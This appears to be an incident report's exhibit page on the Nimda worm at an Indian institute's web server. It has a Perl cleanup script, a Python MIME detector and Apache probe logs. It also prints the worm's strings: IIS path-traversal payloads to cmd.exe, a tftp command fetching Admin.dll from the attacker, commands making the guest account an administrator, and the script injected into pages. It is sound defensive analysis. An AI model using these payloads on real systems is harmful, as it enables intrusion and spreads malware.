When Things suddenly went wrong: w32.nimda.a@mm - Exhibits
Exhibits related to the Nimda attack at www.iimcal.ac.in
Exhibit A - CleanScript.pl (The script that strips the line Nimda appends to every page in the infected file hierarchy.)
#!/usr/bin/perl
# Walks the web tree and removes the line the worm appends to every
# html/htm/asp page (the line containing "readme.eml").
# Change this to the starting point of your directory dump
$dir = "/home/n_ravikiran/Website";
$filecount = 0;
&listdirectory($dir);

sub listdirectory {
    local($dir); local(@lines); local($entry); local($subdir);
    $dir = $_[0];
    if (opendir(DIR, $dir)) {
        @lines = readdir(DIR);
        closedir(DIR);
        foreach $entry (@lines) {
            # readdir order is not guaranteed, so skip "." and ".." by name
            # rather than assuming they are the first two entries; otherwise
            # the walk can recurse into "." for ever.
            next if ($entry eq "." || $entry eq "..");
            $subdir = $dir . "/" . $entry;
            if (-d $subdir) {
                &listdirectory($subdir);
            } else {
                &processnames($subdir);
            }
        }
    }
}

sub processnames {
    local($file) = $_[0];
    local(@totalFile); local($line);
    $filecount++;
    if (open(FP, $file)) {
        @totalFile = <FP>;
        close(FP);
        # Rewrite only files that actually carry the injected line, so clean
        # pages and binaries are left untouched.
        if (grep(/readme\.eml/, @totalFile)) {
            open(FP, ">$file");
            foreach $line (@totalFile) {
                if ($line =~ /readme\.eml/) {
                    # Show what is being dropped. If a page did not end in a
                    # newline, the appended script shares a line with the
                    # page's last line and that line goes with it; check here.
                    print($line);
                } else {
                    print FP $line;
                }
            }
            close(FP);
        }
    }
    print("$filecount $file\n");
}
Exhibit B - Interesting Strings
a) Some registry entries. The first four are the TCP/IP configuration keys (the Windows 9x VxD key and the NT Tcpip\Parameters key) the worm reads for the host's own addressing; the last is the copyright string embedded in the worm body.
System\CurrentControlSet\Services\VxD\MSTCP
NameServer
SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\
SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces
Concept Virus(CV) V.5, Copyright(C)2001 R.P.China
b) The header of the mail file. Note that the attachment is declared as a wave file (audio/x-wav) while its name is readme.exe: this is the trick used to deliver an executable. Internet Explorer and Outlook of the day trusted the declared type over the file name and opened "audio" bodies automatically (the MIME header flaw fixed in MS01-020), and the zero-size iframe in the HTML part references the attachment by its Content-ID, so it loads as soon as the mail is previewed.
MIME-Version: 1.0
Content-Type: multipart/related; type="multipart/alternative"; boundary="====_ABC1234567890DEF_===="
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1

--====_ABC1234567890DEF_====
Content-Type: multipart/alternative; boundary="====_ABC0987654321DEF_===="

--====_ABC0987654321DEF_====
Content-Type: text/html; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

<HTML><HEAD></HEAD><BODY bgColor=3D#ffffff>
<iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0>
</iframe></BODY></HTML>
--====_ABC0987654321DEF_====--
--====_ABC1234567890DEF_====
Content-Type: audio/x-wav; name="readme.exe"
Content-Transfer-Encoding: base64
Content-ID: <EA4DMGBP9p>

--====_ABC1234567890DEF_====
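A small parser that flags the two things the header above shows, written in Python as an added example for this page (not code from the original page or from the worm): the attachment whose declared type (audio/x-wav) does not match its executable name, and the HTML part whose zero-size iframe pulls that attachment in by Content-ID. The message below is a reconstruction of the exhibit with a two-byte placeholder in place of the base64 body; the extension list, the second clean message and the wording of the findings are this example's own choices.

```python
import re
import email
from email import policy

# Constructed reproduction of the Exhibit B(b) header; the base64 body is a
# two-byte placeholder ("TVo=" is just "MZ"), not the worm.
SAMPLE_MAIL = """\
MIME-Version: 1.0
Content-Type: multipart/related; type="multipart/alternative"; boundary="====_ABC1234567890DEF_===="
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1

--====_ABC1234567890DEF_====
Content-Type: multipart/alternative; boundary="====_ABC0987654321DEF_===="

--====_ABC0987654321DEF_====
Content-Type: text/html; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

<HTML><HEAD></HEAD><BODY bgColor=3D#ffffff>
<iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0>
</iframe></BODY></HTML>
--====_ABC0987654321DEF_====--
--====_ABC1234567890DEF_====
Content-Type: audio/x-wav; name="readme.exe"
Content-Transfer-Encoding: base64
Content-ID: <EA4DMGBP9p>

TVo=
--====_ABC1234567890DEF_====--
"""

# Constructed clean message for contrast.
BENIGN_MAIL = "MIME-Version: 1.0\nContent-Type: text/plain\n\nmeeting at five\n"

# Extensions Windows runs on double-click (this example's own list).
EXEC_EXT = ('.exe', '.com', '.scr', '.pif', '.bat', '.vbs', '.dll')
IFRAME_CID_RE = re.compile(r'<iframe[^>]*\bsrc=["\']?cid:([^"\'\s>]+)', re.I)


def analyse(raw: str) -> dict:
    """Walk a MIME message and collect findings about executable content
    that is declared as something else or auto-loaded by inline HTML."""
    msg = email.message_from_string(raw, policy=policy.default)
    findings = []
    parts_by_cid = {}
    iframe_cids = []
    for part in msg.walk():
        if part.is_multipart():
            continue
        ctype = part.get_content_type()
        name = (part.get_filename() or '').lower()
        cid = str(part.get('Content-ID') or '').strip().strip('<>')
        if cid:
            parts_by_cid[cid] = part
        # Declared type says "sound", file name says "program": the MS01-020 lure.
        if name.endswith(EXEC_EXT) and not ctype.startswith('application/'):
            findings.append(f'type mismatch: {name} declared as {ctype}')
        if ctype == 'text/html':
            # get_content() undoes the quoted-printable encoding (=3D -> =).
            iframe_cids.extend(IFRAME_CID_RE.findall(part.get_content()))
    # Resolve every iframe cid: reference to the part it would load.
    for cid in iframe_cids:
        target = parts_by_cid.get(cid)
        if target is None:
            findings.append(f'iframe references unknown cid:{cid}')
        elif (target.get_filename() or '').lower().endswith(EXEC_EXT):
            findings.append(f'iframe auto-loads executable part cid:{cid} ({target.get_filename()})')
    return {'suspicious': bool(findings), 'findings': findings}


if __name__ == '__main__':
    for line in analyse(SAMPLE_MAIL)['findings']:
        print(line)
```

Run against a mail spool this gives two findings for a Nimda message and none for ordinary mail; the cid cross-check is the part worth keeping, since a lone audio/x-wav attachment is harmless until something in the message loads it.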
c) Some more neat ideas. This is how the virus covers its tracks even when cleaning is attempted from the DOS prompt: the [rename] section of wininit.ini is processed by Windows 9x at the next boot, before the shell comes up, and an entry of the form NUL=<file> deletes that file. The worm writes such an entry so that its leftovers (its own temporary copies) are removed at reboot, outside any running session.
NUL=
[rename]
\wininit.ini
d) Payload on the local machine. Notice the share being created (share c$=c:\), the guest account given a blank password, enabled and added to Administrators, and the Explorer settings that hide file extensions (HideFileExt, ShowSuperHidden, Hidden). The reason for the last is wonderful: readme.exe carries an icon that looks like Internet Explorer's HTML-document icon with the 'e' symbol, so with extensions hidden it passes for a web page; if extensions were displayed this way of inducing users to run the file would fail. fsdhqherwqi2001 is the name the worm uses as its mutex so that only one copy runs.
Personal
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
\*.*
EXPLORER
fsdhqherwqi2001
SYSTEM\CurrentControlSet\Services\lanmanserver\Shares\Security
share c$=c:\
user guest ""
localgroup Administrators guest /add
localgroup Guests guest /add
user guest /active
open
user guest /add
HideFileExt
ShowSuperHidden
Hidden
Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
\\%s
%ld %ld %ld %ld %ld
e) On NT: performance counter keys. These are the perflib registry keys (perflib\009 holds the English counter names, Last Counter the highest counter index) together with the counter names of the Process object (ID Process, Elapsed Time, Working Set, % Processor Time and so on). Reading the performance data this way is the NT 4 method of listing running processes by name and PID, so rather than a time bomb this is most likely process enumeration; the "counter" is the perflib index used to locate the Process object.
ID Process
Elapsed Time
Priority Base
Working Set Peak
Working Set
% User Time
% Privileged Time
% Processor Time
Process
Counter 009
software\microsoft\windows nt\currentversion\perflib\009
Counters
Version
Last Counter
software\microsoft\windows nt\currentversion\perflib
f) NT again: the attack on IIS. The first requests look for root.exe, the copy of cmd.exe that Code Red II left in /scripts and /MSADC on servers it had compromised. The rest walk out of the web root with the Unicode traversal (%c0%af, %c0%2f, %c1%1c, %c1%9c: overlong encodings of / and \ that IIS 4/5 decoded after checking the path) and the double-decode traversal (%255c, %%35%63, %25%35%63, %252f: each becomes \ or / only on a second decoding pass) to reach /winnt/system32/cmd.exe. Once cmd.exe answers, the worm has the victim run tftp -i <attacker> GET Admin.dll to fetch the worm body and tries to place Admin.dll on c:, d: and e:. The net use \\%s\ipc$ "" /user:"guest" string ties in with the guest account it enables with a blank password in d).
/scripts
/MSADC
/scripts/..%255c..
/_vti_bin/..%255c../..%255c../..%255c..
/_mem_bin/..%255c../..%255c../..%255c..
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c..
/scripts/..%c1%1c..
/scripts/..%c0%2f..
/scripts/..%c0%af..
/scripts/..%c1%9c..
/scripts/..%%35%63..
/scripts/..%%35c..
/scripts/..%25%35%63..
/scripts/..%252f..
/root.exe?/c+
/winnt/system32/cmd.exe?/c+
net%%20use%%20\\%s\ipc$%%20""%%20/user:"guest"
tftp%%20-i%%20%s%%20GET%%20Admin.dll%%20
Admin.dll
c:\Admin.dll
d:\Admin.dll
e:\Admin.dll
g) The string appended to web pages to deliver the payload; this is what started it all. Every reachable page gets this line, which opens readme.eml in a window placed at top=6000,left=6000, i.e. off-screen, so the visitor never sees it. Below it is the template of the HTTP request the worm sends while scanning: the fixed "Host: www" header and the misspelled "Connnection:" (three n's) header make a handy signature in web server logs.
<html><script language="JavaScript">window.open("readme.eml",null, "resizable=no,top=6000,left=6000")</script></html>
/Admin.dll
GET %s HTTP/1.0
Host: www
Connnection: close
h) Strings from the file-infection side of the payload. The worm hunts for pages named readme, main, index or default with .html, .asp or .htm extensions and drops \readme.eml beside them; it infects .exe files, except winzip32.exe, which Symantec reports it leaves alone. riched20.dll is replaced by a copy of the worm, which is why Word (or any other editor that loads the rich edit control) stops working properly. dontrunold is the switch on the Shell= line it writes into system.ini.
readme
main
index
default
html
.asp
.htm
\readme.eml
.exe
winzip32.exe
riched20.dll
.nws
.eml
.doc
.exe
dontrunold
i) References that show what the payload does on the user side: Winsock calls (gethostbyname, sendto, recvfrom, ...) for scanning and the tftp transfer, the MAPI functions for reading the user's mailbox and resolving addresses, raw SMTP verbs (HELO aabbcc, MAIL FROM:, RCPT TO:, DATA) for sending its own mail, and the names under which it installs itself: \mmc.exe, \load.exe, \riched20.dll, the system.ini line Shell=explorer.exe load.exe -dontrunold, and the qusery9bnow switch.
gethostbyname
gethostname
sendto
send
recvfrom
recv
MAPILogoff
MAPISendMail
MAPIFreeBuffer
MAPIReadMail
MAPIFindNext
MAPIResolveName
MAPILogon
MAPI32.DLL
Subject:
From: <
DATA
RCPT TO: <
MAIL FROM: <
HELO aabbcc
-dontrunold
NULL
\readme*.exe
admin.dll
qusery9bnow
-qusery9bnow
\mmc.exe
\riched20.dll
boot
Shell
explorer.exe load.exe -dontrunold
\system.ini
\load.exe
octet
j) Some more registry entries: the App Paths key, the Windows 9x LanMan share definitions (X$ with Flags, Path, Parm1enc, Parm2enc) used to share drives, the NT lanmanserver Shares key, and Explorer's MapMail key.
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths
Type
Remark
SOFTWARE\Microsoft\Windows\CurrentVersion\Network\LanMan\X$
Parm2enc
Parm1enc
Flags
Path
SOFTWARE\Microsoft\Windows\CurrentVersion\Network\LanMan\
SOFTWARE\Microsoft\Windows\CurrentVersion\Network\LanMan
SYSTEM\CurrentControlSet\Services\lanmanserver\Shares
Cache
Software\Microsoft\Windows\CurrentVersion\Explorer\MapMail
QUIT
Exhibit C - Nimda Attack Sequence
The following lines are the Apache log of the attack on our Linux machine by one particular IIS server. Our own IIS server fell to the first of these attacks; the Linux server has been weathering the blizzard all along. The worm cannot infect it (every probe is answered with a 404, or a 400 where the %% encoding is not even a valid request, as the status codes show), but the sense of safety is still welcome. Initially the probes came only from 203. addresses, which matches the worm's target selection (it prefers addresses that share the first one or two octets with the infected host), but we are now seeing attacks from all sorts of IP ranges. Also worth noting: the attacks on this machine have become particularly heavy, while the patched IIS server was subsequently left alone, so the choice of target does not look entirely random.
203.197.64.3 - - [21/Sep/2001:16:38:29 +0530] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 292 "-" "-"
203.197.64.3 - - [21/Sep/2001:16:38:29 +0530] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 290 "-" "-"
203.197.64.3 - - [21/Sep/2001:16:38:29 +0530] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300 "-" "-"
203.197.64.3 - - [21/Sep/2001:16:38:29 +0530] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300 "-" "-"
203.197.64.3 - - [21/Sep/2001:16:38:29 +0530] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 314 "-" "-"
203.197.64.3 - - [21/Sep/2001:16:38:29 +0530] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 331 "-" "-"
203.197.64.3 - - [21/Sep/2001:16:38:29 +0530] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 331 "-" "-"
203.197.64.3 - - [21/Sep/2001:16:38:29 +0530] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 347 "-" "-"
203.197.64.3 - - [21/Sep/2001:16:38:29 +0530] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 313 "-" "-"
203.197.64.3 - - [21/Sep/2001:16:38:29 +0530] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 313 "-" "-"
203.197.64.3 - - [21/Sep/2001:16:38:30 +0530] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 313 "-" "-"
203.197.64.3 - - [21/Sep/2001:16:38:30 +0530] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 313 "-" "-"
203.197.64.3 - - [21/Sep/2001:16:38:30 +0530] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 297 "-" "-"
203.197.64.3 - - [21/Sep/2001:16:38:30 +0530] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 297 "-" "-"
203.197.64.3 - - [21/Sep/2001:16:38:30 +0530] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 314 "-" "-"
203.197.64.3 - - [21/Sep/2001:16:38:30 +0530] "GET /scripts/..%252
